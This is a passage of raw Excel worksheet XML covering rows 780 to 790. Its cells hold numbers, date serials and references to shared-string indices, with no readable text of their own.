      <c r="U780">
        <v>0</v>
      </c>
      <c r="V780">
        <v>0</v>
      </c>
      <c r="W780">
        <v>0</v>
      </c>
      <c r="X780">
        <v>0</v>
      </c>
      <c r="Y780">
        <v>0</v>
      </c>
      <c r="Z780">
        <v>0</v>
      </c>
      <c r="AA780">
        <v>0</v>
      </c>
      <c r="AB780">
        <v>800</v>
      </c>
      <c r="AC780">
        <v>1500</v>
      </c>
      <c r="AD780">
        <v>0</v>
      </c>
      <c r="AE780">
        <v>1500</v>
      </c>
      <c r="AF780" t="s">
        <v>6087</v>
      </c>
      <c r="AG780">
        <v>85351</v>
      </c>
      <c r="AH780">
        <v>19</v>
      </c>
      <c r="AJ780">
        <v>295</v>
      </c>
      <c r="AK780" t="s">
        <v>6088</v>
      </c>
      <c r="AL780" t="s">
        <v>6089</v>
      </c>
      <c r="AM780" t="s">
        <v>6090</v>
      </c>
      <c r="AN780" t="s">
        <v>55</v>
      </c>
      <c r="AO780">
        <v>2016</v>
      </c>
      <c r="AP780">
        <v>81339131911</v>
      </c>
      <c r="AQ780" t="s">
        <v>6091</v>
      </c>
      <c r="AR780" t="s">
        <v>6092</v>
      </c>
      <c r="AS780" t="s">
        <v>71</v>
      </c>
      <c r="AT780" t="s">
        <v>58</v>
      </c>
      <c r="AU780">
        <v>6</v>
      </c>
      <c r="AV780">
        <v>2</v>
      </c>
      <c r="AW780">
        <v>45</v>
      </c>
      <c r="AX780">
        <v>7</v>
      </c>
      <c r="AY780">
        <v>5</v>
      </c>
      <c r="AZ780">
        <v>3</v>
      </c>
      <c r="BA780" t="s">
        <v>17266</v>
      </c>
      <c r="BB780" t="s">
        <v>15925</v>
      </c>
      <c r="BC780" t="s">
        <v>11091</v>
      </c>
      <c r="BD780" t="s">
        <v>11082</v>
      </c>
    </row>
    <row r="781" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A781">
        <v>2367</v>
      </c>
      <c r="B781" t="s">
        <v>6093</v>
      </c>
      <c r="C781" t="s">
        <v>129</v>
      </c>
      <c r="D781" t="s">
        <v>6094</v>
      </c>
      <c r="E781" t="s">
        <v>142</v>
      </c>
      <c r="F781" t="s">
        <v>6095</v>
      </c>
      <c r="G781" s="1">
        <v>44287</v>
      </c>
      <c r="H781">
        <v>3970</v>
      </c>
      <c r="I781">
        <v>3970</v>
      </c>
      <c r="J781">
        <v>0</v>
      </c>
      <c r="K781">
        <v>0</v>
      </c>
      <c r="L781">
        <v>0</v>
      </c>
      <c r="M781">
        <v>0</v>
      </c>
      <c r="N781">
        <v>0</v>
      </c>
      <c r="O781">
        <v>0</v>
      </c>
      <c r="P781">
        <v>0</v>
      </c>
      <c r="Q781">
        <v>2</v>
      </c>
      <c r="R781">
        <v>44</v>
      </c>
      <c r="S781">
        <v>0</v>
      </c>
      <c r="T781">
        <v>0</v>
      </c>
      <c r="U781">
        <v>0</v>
      </c>
      <c r="V781">
        <v>0</v>
      </c>
      <c r="W781">
        <v>0</v>
      </c>
      <c r="X781">
        <v>0</v>
      </c>
      <c r="Y781">
        <v>0</v>
      </c>
      <c r="Z781">
        <v>0</v>
      </c>
      <c r="AA781">
        <v>0</v>
      </c>
      <c r="AB781">
        <v>400</v>
      </c>
      <c r="AC781">
        <v>2200</v>
      </c>
      <c r="AD781">
        <v>0</v>
      </c>
      <c r="AE781">
        <v>0</v>
      </c>
      <c r="AF781" t="s">
        <v>6096</v>
      </c>
      <c r="AG781">
        <v>15211</v>
      </c>
      <c r="AH781">
        <v>11</v>
      </c>
      <c r="AJ781">
        <v>268</v>
      </c>
      <c r="AK781" t="s">
        <v>252</v>
      </c>
      <c r="AL781" t="s">
        <v>253</v>
      </c>
      <c r="AM781" t="s">
        <v>6097</v>
      </c>
      <c r="AN781" t="s">
        <v>55</v>
      </c>
      <c r="AO781">
        <v>2008</v>
      </c>
      <c r="AP781" t="s">
        <v>6098</v>
      </c>
      <c r="AQ781" t="s">
        <v>6099</v>
      </c>
      <c r="AR781" t="s">
        <v>6096</v>
      </c>
      <c r="AS781" t="s">
        <v>187</v>
      </c>
      <c r="AT781" t="s">
        <v>58</v>
      </c>
      <c r="AU781">
        <v>25</v>
      </c>
      <c r="AV781">
        <v>2</v>
      </c>
      <c r="AW781">
        <v>8</v>
      </c>
      <c r="AX781">
        <v>0</v>
      </c>
      <c r="AY781">
        <v>2</v>
      </c>
      <c r="AZ781">
        <v>0</v>
      </c>
      <c r="BA781" t="s">
        <v>16927</v>
      </c>
      <c r="BB781" t="s">
        <v>15342</v>
      </c>
      <c r="BC781">
        <v>0</v>
      </c>
      <c r="BD781" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="782" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A782">
        <v>2186</v>
      </c>
      <c r="B782" t="s">
        <v>6100</v>
      </c>
      <c r="C782" t="s">
        <v>318</v>
      </c>
      <c r="D782" t="s">
        <v>6101</v>
      </c>
      <c r="E782" t="s">
        <v>363</v>
      </c>
      <c r="F782" t="s">
        <v>364</v>
      </c>
      <c r="G782" s="1">
        <v>44287</v>
      </c>
      <c r="H782">
        <v>3985</v>
      </c>
      <c r="I782">
        <v>3985</v>
      </c>
      <c r="J782">
        <v>0</v>
      </c>
      <c r="K782">
        <v>0</v>
      </c>
      <c r="L782">
        <v>0</v>
      </c>
      <c r="M782">
        <v>0</v>
      </c>
      <c r="N782">
        <v>0</v>
      </c>
      <c r="O782">
        <v>0</v>
      </c>
      <c r="P782">
        <v>0</v>
      </c>
      <c r="Q782">
        <v>0</v>
      </c>
      <c r="R782">
        <v>0</v>
      </c>
      <c r="S782">
        <v>1</v>
      </c>
      <c r="T782">
        <v>1</v>
      </c>
      <c r="U782">
        <v>0</v>
      </c>
      <c r="V782">
        <v>0</v>
      </c>
      <c r="W782">
        <v>0</v>
      </c>
      <c r="X782">
        <v>0</v>
      </c>
      <c r="Y782">
        <v>0</v>
      </c>
      <c r="Z782">
        <v>0</v>
      </c>
      <c r="AA782">
        <v>0</v>
      </c>
      <c r="AB782">
        <v>0</v>
      </c>
      <c r="AC782">
        <v>0</v>
      </c>
      <c r="AD782">
        <v>1</v>
      </c>
      <c r="AE782">
        <v>200000</v>
      </c>
      <c r="AF782" t="s">
        <v>6102</v>
      </c>
      <c r="AG782">
        <v>90241</v>
      </c>
      <c r="AH782">
        <v>26</v>
      </c>
      <c r="AJ782">
        <v>420</v>
      </c>
      <c r="AK782" t="s">
        <v>936</v>
      </c>
      <c r="AL782" t="s">
        <v>937</v>
      </c>
      <c r="AM782" t="s">
        <v>6103</v>
      </c>
      <c r="AN782" t="s">
        <v>55</v>
      </c>
      <c r="AO782">
        <v>2018</v>
      </c>
      <c r="AP782">
        <v>81249852617</v>
      </c>
      <c r="AQ782" t="s">
        <v>6104</v>
      </c>
      <c r="AR782" t="s">
        <v>6102</v>
      </c>
      <c r="AS782" t="s">
        <v>371</v>
      </c>
      <c r="AT782" t="s">
        <v>58</v>
      </c>
      <c r="AU782">
        <v>1</v>
      </c>
      <c r="AV782">
        <v>1</v>
      </c>
      <c r="AW782">
        <v>5</v>
      </c>
      <c r="AX782">
        <v>0</v>
      </c>
      <c r="AY782">
        <v>2</v>
      </c>
      <c r="AZ782">
        <v>2</v>
      </c>
      <c r="BA782" t="s">
        <v>17222</v>
      </c>
      <c r="BB782" t="s">
        <v>15870</v>
      </c>
      <c r="BC782">
        <v>0</v>
      </c>
      <c r="BD782" t="s">
        <v>12846</v>
      </c>
    </row>
    <row r="783" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A783">
        <v>2075</v>
      </c>
      <c r="B783" t="s">
        <v>6105</v>
      </c>
      <c r="C783" t="s">
        <v>47</v>
      </c>
      <c r="D783" t="s">
        <v>6106</v>
      </c>
      <c r="E783" t="s">
        <v>142</v>
      </c>
      <c r="F783" t="s">
        <v>666</v>
      </c>
      <c r="G783" s="1">
        <v>44001</v>
      </c>
      <c r="H783">
        <v>4162</v>
      </c>
      <c r="I783">
        <v>4162</v>
      </c>
      <c r="J783">
        <v>1</v>
      </c>
      <c r="K783">
        <v>0</v>
      </c>
      <c r="L783">
        <v>0</v>
      </c>
      <c r="M783">
        <v>0</v>
      </c>
      <c r="N783">
        <v>0</v>
      </c>
      <c r="O783">
        <v>0</v>
      </c>
      <c r="P783">
        <v>0</v>
      </c>
      <c r="Q783">
        <v>1</v>
      </c>
      <c r="R783">
        <v>2</v>
      </c>
      <c r="S783">
        <v>0</v>
      </c>
      <c r="T783">
        <v>0</v>
      </c>
      <c r="U783">
        <v>75000</v>
      </c>
      <c r="V783">
        <v>0</v>
      </c>
      <c r="W783">
        <v>0</v>
      </c>
      <c r="X783">
        <v>0</v>
      </c>
      <c r="Y783">
        <v>0</v>
      </c>
      <c r="Z783">
        <v>0</v>
      </c>
      <c r="AA783">
        <v>0</v>
      </c>
      <c r="AB783">
        <v>1</v>
      </c>
      <c r="AC783">
        <v>400</v>
      </c>
      <c r="AD783">
        <v>0</v>
      </c>
      <c r="AE783">
        <v>0</v>
      </c>
      <c r="AF783" t="s">
        <v>6107</v>
      </c>
      <c r="AG783">
        <v>20241</v>
      </c>
      <c r="AH783">
        <v>2</v>
      </c>
      <c r="AJ783">
        <v>53</v>
      </c>
      <c r="AK783" t="s">
        <v>1582</v>
      </c>
      <c r="AL783" t="s">
        <v>6108</v>
      </c>
      <c r="AM783" t="s">
        <v>6109</v>
      </c>
      <c r="AN783" t="s">
        <v>68</v>
      </c>
      <c r="AO783">
        <v>2019</v>
      </c>
      <c r="AP783">
        <v>8126004833</v>
      </c>
      <c r="AQ783" t="s">
        <v>6110</v>
      </c>
      <c r="AR783" t="s">
        <v>6107</v>
      </c>
      <c r="AS783" t="s">
        <v>179</v>
      </c>
      <c r="AT783" t="s">
        <v>58</v>
      </c>
      <c r="AU783">
        <v>26</v>
      </c>
      <c r="AV783">
        <v>1</v>
      </c>
      <c r="AW783">
        <v>13</v>
      </c>
      <c r="AX783">
        <v>2</v>
      </c>
      <c r="AY783">
        <v>2</v>
      </c>
      <c r="AZ783">
        <v>4</v>
      </c>
      <c r="BA783" t="s">
        <v>17055</v>
      </c>
      <c r="BB783" t="s">
        <v>15681</v>
      </c>
      <c r="BC783" t="s">
        <v>11136</v>
      </c>
      <c r="BD783" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="784" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A784">
        <v>1980</v>
      </c>
      <c r="B784" t="s">
        <v>6111</v>
      </c>
      <c r="C784" t="s">
        <v>157</v>
      </c>
      <c r="D784" t="s">
        <v>6112</v>
      </c>
      <c r="E784" t="s">
        <v>49</v>
      </c>
      <c r="F784" t="s">
        <v>3469</v>
      </c>
      <c r="G784" s="1">
        <v>44194</v>
      </c>
      <c r="H784">
        <v>4294</v>
      </c>
      <c r="I784">
        <v>4294</v>
      </c>
      <c r="J784">
        <v>0</v>
      </c>
      <c r="K784">
        <v>3</v>
      </c>
      <c r="L784">
        <v>0</v>
      </c>
      <c r="M784">
        <v>0</v>
      </c>
      <c r="N784">
        <v>0</v>
      </c>
      <c r="O784">
        <v>0</v>
      </c>
      <c r="P784">
        <v>0</v>
      </c>
      <c r="Q784">
        <v>0</v>
      </c>
      <c r="R784">
        <v>14</v>
      </c>
      <c r="S784">
        <v>0</v>
      </c>
      <c r="T784">
        <v>3</v>
      </c>
      <c r="U784">
        <v>0</v>
      </c>
      <c r="V784">
        <v>3</v>
      </c>
      <c r="W784">
        <v>0</v>
      </c>
      <c r="X784">
        <v>0</v>
      </c>
      <c r="Y784">
        <v>0</v>
      </c>
      <c r="Z784">
        <v>0</v>
      </c>
      <c r="AA784">
        <v>0</v>
      </c>
      <c r="AB784">
        <v>0</v>
      </c>
      <c r="AC784">
        <v>1000</v>
      </c>
      <c r="AD784">
        <v>0</v>
      </c>
      <c r="AE784">
        <v>72000</v>
      </c>
      <c r="AF784" t="s">
        <v>6113</v>
      </c>
      <c r="AG784">
        <v>61264</v>
      </c>
      <c r="AH784">
        <v>16</v>
      </c>
      <c r="AJ784">
        <v>242</v>
      </c>
      <c r="AK784" t="s">
        <v>6029</v>
      </c>
      <c r="AL784" t="s">
        <v>3815</v>
      </c>
      <c r="AM784" t="s">
        <v>6114</v>
      </c>
      <c r="AN784" t="s">
        <v>55</v>
      </c>
      <c r="AO784">
        <v>2007</v>
      </c>
      <c r="AP784" t="s">
        <v>6115</v>
      </c>
      <c r="AQ784" t="s">
        <v>6116</v>
      </c>
      <c r="AR784" t="s">
        <v>6113</v>
      </c>
      <c r="AS784" t="s">
        <v>71</v>
      </c>
      <c r="AT784" t="s">
        <v>58</v>
      </c>
      <c r="AU784">
        <v>26</v>
      </c>
      <c r="AV784">
        <v>1</v>
      </c>
      <c r="AW784">
        <v>30</v>
      </c>
      <c r="AX784">
        <v>20</v>
      </c>
      <c r="AY784">
        <v>12</v>
      </c>
      <c r="AZ784">
        <v>8</v>
      </c>
      <c r="BA784" t="s">
        <v>17037</v>
      </c>
      <c r="BB784" t="s">
        <v>15624</v>
      </c>
      <c r="BC784" t="s">
        <v>9751</v>
      </c>
      <c r="BD784" t="s">
        <v>9752</v>
      </c>
    </row>
    <row r="785" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A785">
        <v>1811</v>
      </c>
      <c r="B785" t="s">
        <v>6117</v>
      </c>
      <c r="C785" t="s">
        <v>318</v>
      </c>
      <c r="D785" t="s">
        <v>6118</v>
      </c>
      <c r="E785" t="s">
        <v>363</v>
      </c>
      <c r="F785" t="s">
        <v>3499</v>
      </c>
      <c r="G785" s="1">
        <v>44096</v>
      </c>
      <c r="H785">
        <v>4300</v>
      </c>
      <c r="I785">
        <v>4300</v>
      </c>
      <c r="J785">
        <v>1</v>
      </c>
      <c r="K785">
        <v>1</v>
      </c>
      <c r="L785">
        <v>2</v>
      </c>
      <c r="M785">
        <v>0</v>
      </c>
      <c r="N785">
        <v>0</v>
      </c>
      <c r="O785">
        <v>0</v>
      </c>
      <c r="P785">
        <v>0</v>
      </c>
      <c r="Q785">
        <v>0</v>
      </c>
      <c r="R785">
        <v>0</v>
      </c>
      <c r="S785">
        <v>1</v>
      </c>
      <c r="T785">
        <v>1</v>
      </c>
      <c r="U785">
        <v>20000</v>
      </c>
      <c r="V785">
        <v>1000</v>
      </c>
      <c r="W785">
        <v>3000</v>
      </c>
      <c r="X785">
        <v>0</v>
      </c>
      <c r="Y785">
        <v>0</v>
      </c>
      <c r="Z785">
        <v>0</v>
      </c>
      <c r="AA785">
        <v>0</v>
      </c>
      <c r="AB785">
        <v>0</v>
      </c>
      <c r="AC785">
        <v>0</v>
      </c>
      <c r="AD785">
        <v>1</v>
      </c>
      <c r="AE785">
        <v>20000</v>
      </c>
      <c r="AF785" t="s">
        <v>6119</v>
      </c>
      <c r="AG785">
        <v>90552</v>
      </c>
      <c r="AH785">
        <v>26</v>
      </c>
      <c r="AJ785">
        <v>406</v>
      </c>
      <c r="AK785" t="s">
        <v>647</v>
      </c>
      <c r="AL785" t="s">
        <v>648</v>
      </c>
      <c r="AM785" t="s">
        <v>6120</v>
      </c>
      <c r="AN785" t="s">
        <v>55</v>
      </c>
      <c r="AO785">
        <v>2012</v>
      </c>
      <c r="AP785" t="s">
        <v>6121</v>
      </c>
      <c r="AQ785" t="s">
        <v>6122</v>
      </c>
      <c r="AR785" t="s">
        <v>6119</v>
      </c>
      <c r="AS785" t="s">
        <v>71</v>
      </c>
      <c r="AT785" t="s">
        <v>58</v>
      </c>
      <c r="AU785">
        <v>30</v>
      </c>
      <c r="AV785">
        <v>1</v>
      </c>
      <c r="AW785">
        <v>0</v>
      </c>
      <c r="AX785">
        <v>20</v>
      </c>
      <c r="AY785">
        <v>24</v>
      </c>
      <c r="AZ785">
        <v>23</v>
      </c>
      <c r="BA785" t="s">
        <v>17003</v>
      </c>
      <c r="BB785" t="s">
        <v>15529</v>
      </c>
      <c r="BC785">
        <v>0</v>
      </c>
      <c r="BD785" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="786" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A786">
        <v>1946</v>
      </c>
      <c r="B786" t="s">
        <v>6123</v>
      </c>
      <c r="C786" t="s">
        <v>5506</v>
      </c>
      <c r="D786" t="s">
        <v>6124</v>
      </c>
      <c r="E786" t="s">
        <v>111</v>
      </c>
      <c r="F786" t="s">
        <v>6125</v>
      </c>
      <c r="G786" s="1">
        <v>44090</v>
      </c>
      <c r="H786">
        <v>4329</v>
      </c>
      <c r="I786">
        <v>4329</v>
      </c>
      <c r="J786">
        <v>2</v>
      </c>
      <c r="K786">
        <v>1</v>
      </c>
      <c r="L786">
        <v>3</v>
      </c>
      <c r="M786">
        <v>0</v>
      </c>
      <c r="N786">
        <v>0</v>
      </c>
      <c r="O786">
        <v>0</v>
      </c>
      <c r="P786">
        <v>0</v>
      </c>
      <c r="Q786">
        <v>0</v>
      </c>
      <c r="R786">
        <v>3</v>
      </c>
      <c r="S786">
        <v>0</v>
      </c>
      <c r="T786">
        <v>0</v>
      </c>
      <c r="U786">
        <v>90000</v>
      </c>
      <c r="V786">
        <v>4000</v>
      </c>
      <c r="W786">
        <v>7000</v>
      </c>
      <c r="X786">
        <v>0</v>
      </c>
      <c r="Y786">
        <v>0</v>
      </c>
      <c r="Z786">
        <v>0</v>
      </c>
      <c r="AA786">
        <v>0</v>
      </c>
      <c r="AB786">
        <v>0</v>
      </c>
      <c r="AC786">
        <v>4000</v>
      </c>
      <c r="AD786">
        <v>0</v>
      </c>
      <c r="AE786">
        <v>0</v>
      </c>
      <c r="AF786" t="s">
        <v>6126</v>
      </c>
      <c r="AG786">
        <v>85226</v>
      </c>
      <c r="AH786">
        <v>19</v>
      </c>
      <c r="AJ786">
        <v>314</v>
      </c>
      <c r="AK786" t="s">
        <v>6127</v>
      </c>
      <c r="AL786" t="s">
        <v>6128</v>
      </c>
      <c r="AM786" t="s">
        <v>6129</v>
      </c>
      <c r="AN786" t="s">
        <v>68</v>
      </c>
      <c r="AO786">
        <v>2012</v>
      </c>
      <c r="AP786">
        <v>3808430877</v>
      </c>
      <c r="AQ786" t="s">
        <v>6130</v>
      </c>
      <c r="AR786" t="s">
        <v>6131</v>
      </c>
      <c r="AS786" t="s">
        <v>71</v>
      </c>
      <c r="AT786" t="s">
        <v>72</v>
      </c>
      <c r="AU786">
        <v>26</v>
      </c>
      <c r="AV786">
        <v>0</v>
      </c>
      <c r="AW786">
        <v>0</v>
      </c>
      <c r="AX786">
        <v>0</v>
      </c>
      <c r="AY786">
        <v>32</v>
      </c>
      <c r="AZ786">
        <v>10</v>
      </c>
      <c r="BA786" t="s">
        <v>17401</v>
      </c>
      <c r="BB786" t="s">
        <v>17402</v>
      </c>
      <c r="BC786" t="s">
        <v>9550</v>
      </c>
      <c r="BD786" t="s">
        <v>11347</v>
      </c>
    </row>
    <row r="787" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A787">
        <v>2245</v>
      </c>
      <c r="B787" t="s">
        <v>6132</v>
      </c>
      <c r="C787" t="s">
        <v>129</v>
      </c>
      <c r="D787" t="s">
        <v>6133</v>
      </c>
      <c r="E787" t="s">
        <v>142</v>
      </c>
      <c r="F787" t="s">
        <v>6134</v>
      </c>
      <c r="G787" s="1">
        <v>44015</v>
      </c>
      <c r="H787">
        <v>4420</v>
      </c>
      <c r="I787">
        <v>4420</v>
      </c>
      <c r="J787">
        <v>1</v>
      </c>
      <c r="K787">
        <v>0</v>
      </c>
      <c r="L787">
        <v>0</v>
      </c>
      <c r="M787">
        <v>0</v>
      </c>
      <c r="N787">
        <v>0</v>
      </c>
      <c r="O787">
        <v>0</v>
      </c>
      <c r="P787">
        <v>0</v>
      </c>
      <c r="Q787">
        <v>0</v>
      </c>
      <c r="R787">
        <v>0</v>
      </c>
      <c r="S787">
        <v>0</v>
      </c>
      <c r="T787">
        <v>0</v>
      </c>
      <c r="U787">
        <v>500000</v>
      </c>
      <c r="V787">
        <v>0</v>
      </c>
      <c r="W787">
        <v>0</v>
      </c>
      <c r="X787">
        <v>0</v>
      </c>
      <c r="Y787">
        <v>0</v>
      </c>
      <c r="Z787">
        <v>0</v>
      </c>
      <c r="AA787">
        <v>0</v>
      </c>
      <c r="AB787">
        <v>0</v>
      </c>
      <c r="AC787">
        <v>0</v>
      </c>
      <c r="AD787">
        <v>0</v>
      </c>
      <c r="AE787">
        <v>0</v>
      </c>
      <c r="AF787" t="s">
        <v>6135</v>
      </c>
      <c r="AG787">
        <v>15142</v>
      </c>
      <c r="AH787">
        <v>11</v>
      </c>
      <c r="AJ787">
        <v>270</v>
      </c>
      <c r="AK787" t="s">
        <v>1048</v>
      </c>
      <c r="AL787" t="s">
        <v>1048</v>
      </c>
      <c r="AM787" t="s">
        <v>6136</v>
      </c>
      <c r="AN787" t="s">
        <v>55</v>
      </c>
      <c r="AO787">
        <v>2015</v>
      </c>
      <c r="AP787" t="s">
        <v>6137</v>
      </c>
      <c r="AQ787" t="s">
        <v>6138</v>
      </c>
      <c r="AR787" t="s">
        <v>6135</v>
      </c>
      <c r="AS787" t="s">
        <v>179</v>
      </c>
      <c r="AT787" t="s">
        <v>58</v>
      </c>
      <c r="AU787">
        <v>22</v>
      </c>
      <c r="AV787">
        <v>2</v>
      </c>
      <c r="AW787">
        <v>1</v>
      </c>
      <c r="AX787">
        <v>0</v>
      </c>
      <c r="AY787">
        <v>2</v>
      </c>
      <c r="AZ787">
        <v>1</v>
      </c>
      <c r="BA787" t="s">
        <v>17100</v>
      </c>
      <c r="BB787" t="s">
        <v>15786</v>
      </c>
      <c r="BC787" t="s">
        <v>11228</v>
      </c>
      <c r="BD787">
        <v>0</v>
      </c>
    </row>
    <row r="788" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A788">
        <v>2532</v>
      </c>
      <c r="B788" t="s">
        <v>6139</v>
      </c>
      <c r="C788" t="s">
        <v>215</v>
      </c>
      <c r="D788" t="s">
        <v>6140</v>
      </c>
      <c r="E788" t="s">
        <v>363</v>
      </c>
      <c r="F788" t="s">
        <v>6141</v>
      </c>
      <c r="G788" s="1">
        <v>44040</v>
      </c>
      <c r="H788">
        <v>4482</v>
      </c>
      <c r="I788">
        <v>4482</v>
      </c>
      <c r="J788">
        <v>0</v>
      </c>
      <c r="K788">
        <v>0</v>
      </c>
      <c r="L788">
        <v>0</v>
      </c>
      <c r="M788">
        <v>0</v>
      </c>
      <c r="N788">
        <v>0</v>
      </c>
      <c r="O788">
        <v>0</v>
      </c>
      <c r="P788">
        <v>0</v>
      </c>
      <c r="Q788">
        <v>0</v>
      </c>
      <c r="R788">
        <v>8</v>
      </c>
      <c r="S788">
        <v>0</v>
      </c>
      <c r="T788">
        <v>1</v>
      </c>
      <c r="U788">
        <v>0</v>
      </c>
      <c r="V788">
        <v>0</v>
      </c>
      <c r="W788">
        <v>0</v>
      </c>
      <c r="X788">
        <v>0</v>
      </c>
      <c r="Y788">
        <v>0</v>
      </c>
      <c r="Z788">
        <v>0</v>
      </c>
      <c r="AA788">
        <v>0</v>
      </c>
      <c r="AB788">
        <v>0</v>
      </c>
      <c r="AC788">
        <v>720</v>
      </c>
      <c r="AD788">
        <v>0</v>
      </c>
      <c r="AE788">
        <v>800</v>
      </c>
      <c r="AF788" t="s">
        <v>6142</v>
      </c>
      <c r="AG788">
        <v>33124</v>
      </c>
      <c r="AH788">
        <v>6</v>
      </c>
      <c r="AJ788">
        <v>147</v>
      </c>
      <c r="AK788" t="s">
        <v>6143</v>
      </c>
      <c r="AL788" t="s">
        <v>6144</v>
      </c>
      <c r="AM788" t="s">
        <v>6145</v>
      </c>
      <c r="AN788" t="s">
        <v>68</v>
      </c>
      <c r="AO788">
        <v>1995</v>
      </c>
      <c r="AP788">
        <v>85366760689</v>
      </c>
      <c r="AQ788" t="s">
        <v>6146</v>
      </c>
      <c r="AR788" t="s">
        <v>6142</v>
      </c>
      <c r="AS788" t="s">
        <v>71</v>
      </c>
      <c r="AT788" t="s">
        <v>72</v>
      </c>
      <c r="AU788">
        <v>20</v>
      </c>
      <c r="AV788">
        <v>1</v>
      </c>
      <c r="AW788">
        <v>0</v>
      </c>
      <c r="AX788">
        <v>0</v>
      </c>
      <c r="AY788">
        <v>1</v>
      </c>
      <c r="AZ788">
        <v>8</v>
      </c>
      <c r="BA788" t="s">
        <v>17158</v>
      </c>
      <c r="BB788">
        <v>0</v>
      </c>
      <c r="BC788" t="s">
        <v>9852</v>
      </c>
      <c r="BD788" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="789" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A789">
        <v>1785</v>
      </c>
      <c r="B789" t="s">
        <v>6147</v>
      </c>
      <c r="C789" t="s">
        <v>47</v>
      </c>
      <c r="D789" t="s">
        <v>6148</v>
      </c>
      <c r="E789" t="s">
        <v>142</v>
      </c>
      <c r="F789" t="s">
        <v>666</v>
      </c>
      <c r="G789" s="1">
        <v>44081</v>
      </c>
      <c r="H789">
        <v>4588</v>
      </c>
      <c r="I789">
        <v>4588</v>
      </c>
      <c r="J789">
        <v>1</v>
      </c>
      <c r="K789">
        <v>0</v>
      </c>
      <c r="L789">
        <v>0</v>
      </c>
      <c r="M789">
        <v>7</v>
      </c>
      <c r="N789">
        <v>0</v>
      </c>
      <c r="O789">
        <v>0</v>
      </c>
      <c r="P789">
        <v>0</v>
      </c>
      <c r="Q789">
        <v>5</v>
      </c>
      <c r="R789">
        <v>5</v>
      </c>
      <c r="S789">
        <v>0</v>
      </c>
      <c r="T789">
        <v>1</v>
      </c>
      <c r="U789">
        <v>400000</v>
      </c>
      <c r="V789">
        <v>0</v>
      </c>
      <c r="W789">
        <v>0</v>
      </c>
      <c r="X789">
        <v>9000</v>
      </c>
      <c r="Y789">
        <v>0</v>
      </c>
      <c r="Z789">
        <v>0</v>
      </c>
      <c r="AA789">
        <v>0</v>
      </c>
      <c r="AB789">
        <v>400</v>
      </c>
      <c r="AC789">
        <v>400</v>
      </c>
      <c r="AD789">
        <v>0</v>
      </c>
      <c r="AE789">
        <v>10000</v>
      </c>
      <c r="AF789" t="s">
        <v>6149</v>
      </c>
      <c r="AG789">
        <v>20413</v>
      </c>
      <c r="AH789">
        <v>2</v>
      </c>
      <c r="AJ789">
        <v>53</v>
      </c>
      <c r="AK789" t="s">
        <v>6150</v>
      </c>
      <c r="AL789" t="s">
        <v>2221</v>
      </c>
      <c r="AM789" t="s">
        <v>6151</v>
      </c>
      <c r="AN789" t="s">
        <v>55</v>
      </c>
      <c r="AO789">
        <v>2007</v>
      </c>
      <c r="AP789">
        <v>81224083573</v>
      </c>
      <c r="AQ789" t="s">
        <v>6152</v>
      </c>
      <c r="AR789" t="s">
        <v>6149</v>
      </c>
      <c r="AU789">
        <v>31</v>
      </c>
      <c r="AV789">
        <v>0</v>
      </c>
      <c r="AW789">
        <v>0</v>
      </c>
      <c r="AX789">
        <v>35</v>
      </c>
      <c r="AY789">
        <v>24</v>
      </c>
      <c r="AZ789">
        <v>72</v>
      </c>
      <c r="BA789" t="s">
        <v>16996</v>
      </c>
      <c r="BB789" t="s">
        <v>14839</v>
      </c>
      <c r="BC789" t="s">
        <v>11392</v>
      </c>
      <c r="BD789">
        <v>0</v>
      </c>
    </row>
    <row r="790" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A790">
        <v>2693</v>
      </c>
      <c r="B790" t="s">
        <v>2812</v>
      </c>
      <c r="C790" t="s">
        <v>88</v>
      </c>
      <c r="D790" t="s">
        <v>6153</v>
      </c>
      <c r="E790" t="s">
        <v>142</v>
      </c>
      <c r="F790" t="s">
        <v>6154</v>
      </c>
      <c r="G790" s="1">
        <v>44020</v>
      </c>
      <c r="H790">
        <v>4722</v>
      </c>
      <c r="I790">
        <v>4722</v>
      </c>
      <c r="J790">
        <v>1</v>
      </c>
      <c r="K790">
        <v>0</v>
      </c>
      <c r="L790">
        <v>0</v>
      </c>
      <c r="M790">
        <v>50</v>
      </c>
      <c r="N790">
        <v>50</v>
      </c>
      <c r="O790">
        <v>5</v>
      </c>
      <c r="P790">
        <v>1</v>
      </c>
      <c r="Q790">
        <v>6</v>
      </c>
      <c r="R790">
        <v>3</v>
      </c>
      <c r="S790">
        <v>1</v>
      </c>
      <c r="T790">
        <v>3</v>
      </c>
      <c r="U790">
        <v>3000</v>
      </c>
      <c r="V790">
        <v>0</v>
      </c>
      <c r="W790">
        <v>0</v>
      </c>
      <c r="X790">
        <v>500</v>
      </c>
      <c r="Y790">
        <v>0</v>
      </c>
      <c r="Z790">
        <v>10</v>
      </c>
      <c r="AA790">
        <v>1000</v>
      </c>
      <c r="AB790">
        <v>50000</v>
      </c>
      <c r="AC790">
        <v>10000</v>
      </c>
      <c r="AD790">
        <v>1000</v>
      </c>
      <c r="AE790">
        <v>1000</v>
      </c>
      <c r="AF790" t="s">
        <v>2815</v>
      </c>
      <c r="AG790">
        <v>80222</v>
      </c>
      <c r="AH790">
        <v>17</v>
      </c>
      <c r="AJ790">
        <v>282</v>
      </c>
      <c r="AK790" t="s">
        <v>592</v>
      </c>
      <c r="AL790" t="s">
        <v>593</v>
      </c>
      <c r="AM790" t="s">
        <v>6155</v>
      </c>
      <c r="AN790" t="s">
        <v>68</v>
      </c>
      <c r="AO790">
        <v>2017</v>
      </c>
      <c r="AP790" t="s">
        <v>2817</v>
      </c>
      <c r="AQ790" t="s">
        <v>6156</v>
      </c>
      <c r="AR790" t="s">
        <v>2819</v>
      </c>
      <c r="AS790" t="s">
        <v>71</v>
      </c>
      <c r="AT790" t="s">
        <v>72</v>
      </c>
      <c r="AU790">
        <v>26</v>
      </c>
      <c r="AV790">
        <v>1</v>
      </c>
      <c r="AW790">
        <v>0</v>
      </c>
      <c r="AX790">
